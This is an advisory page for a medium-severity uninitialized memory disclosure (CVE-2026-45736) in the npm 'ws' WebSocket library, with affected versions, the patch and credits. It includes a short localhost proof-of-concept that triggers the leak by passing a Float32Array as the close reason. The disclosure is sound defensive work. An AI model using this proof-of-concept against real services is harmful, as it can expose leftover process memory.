What is GHSA-58qx-3vcg-4xpx?

GHSA-58qx-3vcg-4xpx is a security advisory published by GitHub Security Advisories with Medium severity. ws: Uninitialized memory disclosure

Which CVE IDs does GHSA-58qx-3vcg-4xpx cover?

GHSA-58qx-3vcg-4xpx covers the following CVE IDs: CVE-2026-45736. Each CVE has its own detail page on EchelonGraph Pulse with the synthesized EG score.

What is the CVSS v3 score of GHSA-58qx-3vcg-4xpx?

GHSA-58qx-3vcg-4xpx has a CVSS v3 base score of 4.4, published by GitHub Security Advisories.

Which products are affected by GHSA-58qx-3vcg-4xpx?

GHSA-58qx-3vcg-4xpx affects 1 product, including: npm/ws:\u003e= 8.0.0, \u003c 8.20.1.

GHSA-58qx-3vcg-4xpxMediumCVSS 4.4

ws: Uninitialized memory disclosure

Vendor

GitHub Security Advisories

Published

May 18, 2026

Last Modified

May 18, 2026

🔗 CVE IDs covered (1)

CVE-2026-45736 →

📋 Description

Impact

The websocket.close() implementation is vulnerable to uninitialized memory disclosure when a TypedArray is passed as the reason argument.

Proof of concept

import { deepStrictEqual } from 'node:assert';
import { WebSocket, WebSocketServer } from 'ws';

const wss = new WebSocketServer(
  { port: 0, skipUTF8Validation: true },
  function () {
    const { port } = wss.address();
    const ws = new WebSocket(`ws://localhost:${port}`, {
      skipUTF8Validation: true
    });

    ws.on('close', function (code, reason) {
      deepStrictEqual(reason, Buffer.alloc(80));
    });
  }
);

wss.on('connection', function (ws) {
  ws.close(1000, new Float32Array(20));
});

Patches

The vulnerability was fixed in ws@8.20.1 (https://github.com/websockets/ws/commit/c0327ec15a54d701eb6ccefaa8bef328cfc03086).

Credits

Credit for the private and responsible disclosure of this issue goes to Nikita Skovoroda.

Remarks

Although the calculated CVSS severity is medium, the actual severity is believed to be low, as the flaw is only exploitable through misuse that is unlikely in practice.